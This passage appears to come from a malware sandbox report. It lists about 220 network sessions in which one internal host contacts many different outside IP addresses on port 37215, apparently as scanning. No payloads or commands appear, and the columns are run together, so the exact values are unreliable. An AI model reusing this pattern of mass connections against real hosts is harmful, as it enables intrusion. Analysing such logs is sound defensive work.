                                              19702192.168.2.155187894.103.106.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19703192.168.2.1534742102.62.58.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19704192.168.2.1554552163.29.201.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19705192.168.2.1535210186.86.224.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19706192.168.2.1539502197.241.153.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19707192.168.2.1551018157.205.72.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19708192.168.2.1550644197.216.148.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19709192.168.2.155548045.59.174.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19710192.168.2.1541744121.56.57.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19711192.168.2.1541252156.59.61.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19712192.168.2.1547542222.149.21.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19713192.168.2.154134845.214.95.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19714192.168.2.1546340186.107.160.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19715192.168.2.1546224197.185.157.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19716192.168.2.1537960197.46.183.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19717192.168.2.1537794186.50.237.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19718192.168.2.1536462190.85.250.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19719192.168.2.155568645.86.213.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19720192.168.2.1539244186.3.202.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19721192.168.2.1546598181.246.24.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19722192.168.2.1539414121.83.95.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19723192.168.2.1551522186.247.103.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19724192.168.2.1556436197.195.21.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19725192.168.2.1548858121.227.90.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19726192.168.2.1534052156.40.97.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19727192.168.2.153710694.33.23.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19728192.168.2.1535390222.86.67.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19729192.168.2.153833841.81.107.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19730192.168.2.153652094.81.37.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19731192.168.2.154496231.209.18.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19732192.168.2.1535792105.243.107.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19733192.168.2.1557140197.220.28.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19734192.168.2.155453645.7.64.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19735192.168.2.1551388122.7.205.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19736192.168.2.1557164197.187.30.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19737192.168.2.1550330156.116.223.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19738192.168.2.1556556122.197.57.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19739192.168.2.1560888186.183.252.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19740192.168.2.1552496222.90.115.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19741192.168.2.1534244121.45.242.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19742192.168.2.1557464222.58.215.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19743192.168.2.1545680186.168.37.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19744192.168.2.154086237.168.54.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19745192.168.2.1558092138.15.249.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19746192.168.2.155871437.16.175.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19747192.168.2.1543914122.183.166.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19748192.168.2.155254837.9.103.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19749192.168.2.1545524190.120.63.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19750192.168.2.155769637.158.88.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19751192.168.2.1559766121.66.88.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19752192.168.2.153427031.230.227.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19753192.168.2.155485845.29.179.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19754192.168.2.1534676138.249.175.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19755192.168.2.153427294.57.194.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19756192.168.2.1558522122.244.203.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19757192.168.2.153525631.40.82.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19758192.168.2.1559644190.7.147.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19759192.168.2.1539518102.68.173.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19760192.168.2.1542994138.104.164.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19761192.168.2.155699425.177.110.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19762192.168.2.1544802102.181.212.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19763192.168.2.1548202186.126.53.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19764192.168.2.1560760138.26.137.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19765192.168.2.1536386113.125.78.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19766192.168.2.1543532122.5.191.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19767192.168.2.154797837.192.80.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19768192.168.2.1558244181.24.181.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19769192.168.2.1535924157.57.150.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19770192.168.2.1540262181.188.74.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19771192.168.2.1559436102.195.115.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19772192.168.2.155865037.159.181.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19773192.168.2.1553894181.96.150.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19774192.168.2.1559156190.90.193.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19775192.168.2.1550638102.77.200.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19776192.168.2.155246637.73.157.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19777192.168.2.1559172121.68.181.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19778192.168.2.1548670138.226.169.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19779192.168.2.1537182197.220.164.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19780192.168.2.1551296138.195.52.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19781192.168.2.155892631.153.169.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19782192.168.2.1551638121.23.11.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19783192.168.2.1546240157.85.31.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19784192.168.2.154800437.64.210.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19785192.168.2.1541520182.22.102.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19786192.168.2.1541534157.132.4.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19787192.168.2.1534826222.231.111.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19788192.168.2.155730841.209.66.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19789192.168.2.1560110181.136.139.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19790192.168.2.1545108122.9.150.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19791192.168.2.1534474157.192.62.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19792192.168.2.155692294.235.218.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19793192.168.2.1553732102.178.68.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19794192.168.2.1541772156.42.182.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19795192.168.2.1548872197.109.121.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19796192.168.2.154636445.20.42.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19797192.168.2.1537500190.82.222.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19798192.168.2.155747837.83.148.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19799192.168.2.1537028222.155.248.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19800192.168.2.1548280186.30.88.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19801192.168.2.1540048156.192.216.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19802192.168.2.1541708156.89.227.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19803192.168.2.1550702157.161.215.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19804192.168.2.1549362153.193.186.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19805192.168.2.1537942197.109.229.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19806192.168.2.155963490.194.254.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19807192.168.2.153412431.136.134.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19808192.168.2.1553592138.1.20.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19809192.168.2.1548126156.13.163.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19810192.168.2.153761041.220.23.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19811192.168.2.1544304102.105.11.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19812192.168.2.1547772156.150.106.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19813192.168.2.155656637.72.222.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19814192.168.2.1536230222.206.67.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19815192.168.2.154766641.106.52.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19816192.168.2.1543096186.113.74.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19817192.168.2.1536728138.186.12.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19818192.168.2.153693831.142.215.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19819192.168.2.1541952102.160.13.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19820192.168.2.1548034186.233.0.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19821192.168.2.154665645.12.163.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19822192.168.2.154740845.192.66.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19823192.168.2.1550714156.94.163.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19824192.168.2.1548438102.180.72.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19825192.168.2.1537084156.46.72.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19826192.168.2.1560864157.174.54.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19827192.168.2.1541162222.216.235.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19828192.168.2.1540016138.195.130.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19829192.168.2.1547262197.227.50.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19830192.168.2.155067694.121.124.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19831192.168.2.1559664157.189.180.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19832192.168.2.154317041.199.167.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19833192.168.2.155518294.110.203.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19834192.168.2.1547104157.74.51.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19835192.168.2.154576437.249.169.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19836192.168.2.1534624102.75.20.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19837192.168.2.1541476222.42.141.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19838192.168.2.1533804156.4.245.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19839192.168.2.1553200181.33.115.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19840192.168.2.1534126181.33.141.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19841192.168.2.155604845.21.126.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19842192.168.2.1545398181.9.251.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19843192.168.2.1533432186.34.235.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19844192.168.2.1542184181.99.57.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19845192.168.2.1555132121.56.147.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19846192.168.2.155080831.66.209.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19847192.168.2.154352845.160.119.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19848192.168.2.1551584102.31.100.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19849192.168.2.1552170102.215.119.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19850192.168.2.1541208157.230.82.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19851192.168.2.1553360222.21.127.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19852192.168.2.153627645.186.46.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19853192.168.2.154108494.229.232.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19854192.168.2.1536096186.237.228.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19855192.168.2.1551550102.203.131.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19856192.168.2.154298641.189.147.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19857192.168.2.1549090121.99.231.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19858192.168.2.1537756121.14.173.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19859192.168.2.155778237.244.15.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19860192.168.2.1546882222.190.231.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19861192.168.2.153417294.223.137.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19862192.168.2.153414694.188.29.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19863192.168.2.1536828181.107.68.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19864192.168.2.154649045.106.183.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19865192.168.2.1540292157.64.137.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19866192.168.2.1557716138.132.139.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19867192.168.2.154429441.248.14.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19868192.168.2.1560056157.174.22.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19869192.168.2.153462031.31.190.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19870192.168.2.1553290197.99.24.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19871192.168.2.1536572102.199.230.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19872192.168.2.154244237.6.146.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19873192.168.2.154201437.117.174.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19874192.168.2.1552328190.99.7.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19875192.168.2.1559126102.40.88.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19876192.168.2.1554810102.114.2.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19877192.168.2.155328037.210.48.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19878192.168.2.1547150186.243.187.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19879192.168.2.1546302197.154.129.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19880192.168.2.1534262138.60.26.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19881192.168.2.1543780122.51.103.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19882192.168.2.155506437.110.227.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19883192.168.2.154187837.253.57.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19884192.168.2.154880645.134.5.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19885192.168.2.1550042222.114.231.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19886192.168.2.1546704222.238.90.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19887192.168.2.1560262157.65.6.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19888192.168.2.155567031.30.21.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19889192.168.2.1535750181.200.196.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19890192.168.2.1537954186.208.156.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19891192.168.2.1534310129.2.213.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19892192.168.2.1541548121.35.116.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19893192.168.2.1536158197.23.43.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19894192.168.2.1553138190.52.207.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19895192.168.2.1556796222.240.149.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19896192.168.2.1545922102.184.165.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19897192.168.2.153760094.142.25.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19898192.168.2.1553254134.107.42.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19899192.168.2.1560880222.102.158.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19900192.168.2.1548516186.142.38.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19901192.168.2.153736631.42.218.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19902192.168.2.1555384121.47.149.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19903192.168.2.1541858222.216.0.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19904192.168.2.1560934197.115.231.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19905192.168.2.153506831.38.120.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19906192.168.2.155516237.40.13.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19907192.168.2.1553992102.7.44.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19908192.168.2.1557742181.49.87.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19909192.168.2.1551570156.147.156.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19910192.168.2.1534062156.172.11.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19911192.168.2.1534700122.54.46.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19912192.168.2.1555850190.162.23.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19913192.168.2.1541870197.241.223.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19914192.168.2.153725094.215.1.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19915192.168.2.153341241.198.12.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19916192.168.2.1559608138.133.22.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19917192.168.2.1556498186.143.205.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19918192.168.2.154373494.201.122.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19919192.168.2.1541036222.163.245.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19920192.168.2.1549836121.224.216.20737215
